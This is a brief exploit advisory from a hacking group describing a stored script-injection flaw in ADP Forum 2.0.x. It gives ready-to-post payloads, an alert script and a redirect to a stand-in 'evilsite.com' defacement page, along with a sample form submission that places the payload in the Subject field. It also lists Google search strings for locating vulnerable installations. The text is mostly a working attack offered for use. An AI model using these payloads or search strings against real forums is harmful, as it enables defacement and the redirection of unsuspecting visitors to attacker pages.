ADP Forum 2.0,* script İnjection
ADP Forum 2.0,* script İnjection
----------------------------------------------------
site:http://www.linux.it/~fedro/
demo:http://www.adp.host.sk/Forum203/
--------------------------------------------------
Post This Code:
<script>alert(/Liz0ziM/)</script>
<script>location.href="http://evilsite.com/deface.html";;</script>
vs..
---------------------------------------------------------
Example Post Message :
Name :Liz0ziM
Username :username
Password :password
E-mail :liz0@xxxxxxxxxxx
Subject :<script>location.href="http://evilsite.com/deface.html";;</script>
Message :LOL :=)
---------------------------------------------------------
Credit:Liz0ziM
Mail :liz0@xxxxxxxxxxx
Site :www.biyosecurity.com
BiyoSecurityTeam: Liz0ziM,Codexploder'tq,r00t3rr0r,y3LL0w
------------------------------------------------------------
google:
"ADP Forum 2.0.3 is powered by VzScripts"
"ADP Forum 2.0.2"
"ADP Forum 2.0.1"
"ADP Forum 2.0"
------------------------------------------------------------
Source:
http://www.blogcu.com/Liz0ziM/338614/
http://biyosecurity.be/bugs/adpforum2.html
http://biyosecurity.be/bugs/adpforum2.txt